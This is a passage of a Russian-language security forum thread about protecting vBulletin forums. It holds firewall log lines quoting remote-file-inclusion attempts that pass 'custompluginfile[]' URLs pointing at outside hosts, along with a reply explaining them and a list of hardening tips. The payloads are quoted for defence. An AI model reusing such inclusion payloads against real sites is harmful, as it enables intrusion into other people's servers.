HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.12.2008, 17:03
Dimon_Aka_Sexxx
Новичок
Регистрация: 22.01.2007
Сообщений: 18
С нами: 10158815

Репутация: 6
По умолчанию

Привет. После установки по твоей рекомендации product-firewall_vb_rs.xml
На почту начали сыпаться письма об атаках.

1||1229949655||212.99.231.50||t=8000/?custompluginfile[]=http://www.healthissue.info/data/id.txt??||||Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6

1||1229929340||69.73.165.48||custompluginfile[]=http://www.fileden.com/files/2008/12/14/2223639/id3.txt???||||libwww-perl/5.805

1||1229854362||84.21.71.133||custompluginfile[]=http://www.primet.ro/col_docs/readme.txt????||||libwww-perl/5.805


Как можно еще подстраховаться, а то уж очень много спамеров и недоброжелателей у моего форума ))

Зы.. и куда вбивать этот код, тот что выше...
Я просто поставил продукт http://allcheats.ru/product-firewall_vb_rs.xml
А куда вписать код который ты указал, не понял.
 
Ответить с цитированием

  #12  
Старый 22.12.2008, 17:29
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

ReanimatoR, спасибо! Отличная статья!
 
Ответить с цитированием

  #13  
Старый 22.12.2008, 20:14
[XMD]Fanat
Новичок
Регистрация: 10.06.2007
Сообщений: 14
С нами: 9958682

Репутация: 30
По умолчанию

Спасибо за статью. Пригодится.
 
Ответить с цитированием

  #14  
Старый 22.12.2008, 22:56
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию

Цитата:
Сообщение от Dimon_Aka_Sexxx  
Привет. После установки по твоей рекомендации product-firewall_vb_rs.xml
На почту начали сыпаться письма об атаках.

1||1229949655||212.99.231.50||t=8000/?custompluginfile[]=http://www.healthissue.info/data/id.txt??||||Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6

1||1229929340||69.73.165.48||custompluginfile[]=http://www.fileden.com/files/2008/12/14/2223639/id3.txt???||||libwww-perl/5.805

1||1229854362||84.21.71.133||custompluginfile[]=http://www.primet.ro/col_docs/readme.txt????||||libwww-perl/5.805


Как можно еще подстраховаться, а то уж очень много спамеров и недоброжелателей у моего форума ))

Зы.. и куда вбивать этот код, тот что выше...
Я просто поставил продукт http://allcheats.ru/product-firewall_vb_rs.xml
А куда вписать код который ты указал, не понял.
Да это предупреждения что ломают твою воблу. вот тип атаки, который заблокировал файрволл:
custompluginfile[]=http://www.fileden.com/files/2008/12/14/2223639/id3.txt

следовательно тебя пытаются взломать(скорее всего у тебя старая вобла и там куча дыр). впринцыпе файрволл спасает, но апдейться!

Если не хочешь чтобы сыпалось на имайл - отключи в основных настройках=)
 
Ответить с цитированием

  #15  
Старый 23.12.2008, 01:30
Dimon_Aka_Sexxx
Новичок
Регистрация: 22.01.2007
Сообщений: 18
С нами: 10158815

Репутация: 6
По умолчанию

Версия последняя в линейке
3.7.4
Какие еще хаки можно поставить... ?
 
Ответить с цитированием

  #16  
Старый 23.12.2008, 16:43
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию

Добавил три "дешевых"(но тоже имеющих свое право на существование ) пункта с vb.org:


11) Отредактируйте config.php, впишите id администраторов в поле undeletable user(неудаляемые/неизменяемый пользователи).


Описание:
/vb/includes/config.php. Просто вписать id администраторов, после того когда внесли все необходимые изменения в профиль.
Почему?: -





12) После удаления модов/хаков не забывайте удалять файлы, которые Вы закачали вместе с ними.


Описание: -
Почему?: -




13) Никогда не сохраняйте бэкапы в папке public_html.


Описание: -
Почему?: Они будут доступны для скачивания любому, кто узнает имя бэкапа.

Последний раз редактировалось ReanimatoR; 23.12.2008 в 16:46..
 
Ответить с цитированием

  #17  
Старый 23.12.2008, 16:48
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Умничка, Миша)
 
Ответить с цитированием

  #18  
Старый 06.02.2009, 02:48
Validol
Участник форума
Регистрация: 15.12.2006
Сообщений: 212
С нами: 10213522

Репутация: 144
По умолчанию

Первые три пункта я у Devil'a на vbsupport видел. Он тестировал мою воблу на уязвимости. Первые три пункта я и словил. Остального не видел. Статья и вправду хорошая, если своя.
 
Ответить с цитированием

  #19  
Старый 09.02.2009, 12:27
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами: 9168511

Репутация: 214
По умолчанию

Может быть я не тут пишу ну да ладно!
Меня один клоун на форуме достал , баню по IP через админку , а он меняет IP'ы. И хз как от него избавиться(
 
Ответить с цитированием

  #20  
Старый 11.02.2009, 21:44
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами: 9168511

Репутация: 214
По умолчанию

Помоветуйте что нибудь!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Скины для форумов vbulletin 3.0.9 XgLuiR Уязвимости CMS / форумов 6 26.11.2005 21:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.